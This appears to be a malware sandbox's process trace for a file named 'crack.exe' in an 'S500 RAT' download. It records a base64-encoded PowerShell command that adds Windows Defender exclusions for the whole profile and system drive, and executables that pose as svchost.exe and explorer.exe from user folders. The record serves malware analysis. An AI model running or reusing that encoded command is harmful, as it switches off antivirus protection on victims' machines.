"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9712 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5108 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8136 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6416 /prefetch:1
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5796 /prefetch:8
C:\Users\Admin\Downloads\S500 RAT\S500 RAT\S500 RAT\S500 RAT\crack.exe
"C:\Users\Admin\Downloads\S500 RAT\S500 RAT\S500 RAT\S500 RAT\crack.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "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"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAZQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAdQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAegBlACMAPgA="
C:\Users\Admin\AppData\Local\Temp\svchost.exe
"C:\Users\Admin\AppData\Local\Temp\svchost.exe"
C:\Users\Admin\AppData\Roaming\explorer.exe
"C:\Users\Admin\AppData\Roaming\explorer.exe"
C:\Users\Admin\AppData\Roaming\explorer.exe
"C:\Users\Admin\AppData\Roaming\explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
C:\Windows\system32\taskkill.exe
taskkill /f /im "explorer.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Users\Admin\explorer.exe
"explorer.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "ver"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1944,7433265484008433780,1720166392886563265,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2440 /prefetch:2
Network
Files
memory/3836-601-0x0000000007C40000-0x0000000007CD6000-memory.dmp
memory/3836-602-0x0000000007BC0000-0x0000000007BD1000-memory.dmp
memory/3836-605-0x0000000007C00000-0x0000000007C0E000-memory.dmp
memory/3836-606-0x0000000007C10000-0x0000000007C25000-memory.dmp
memory/3836-607-0x0000000007D00000-0x0000000007D1A000-memory.dmp
memory/3836-608-0x0000000007CF0000-0x0000000007CF8000-memory.dmp
memory/3836-611-0x0000000074800000-0x0000000074FB1000-memory.dmp
memory/5420-613-0x0000000074800000-0x0000000074FB1000-memory.dmp
memory/5604-618-0x00007FFD5BF70000-0x00007FFD5C3D6000-memory.dmp
memory/5604-619-0x00007FFD6AC90000-0x00007FFD6ACB4000-memory.dmp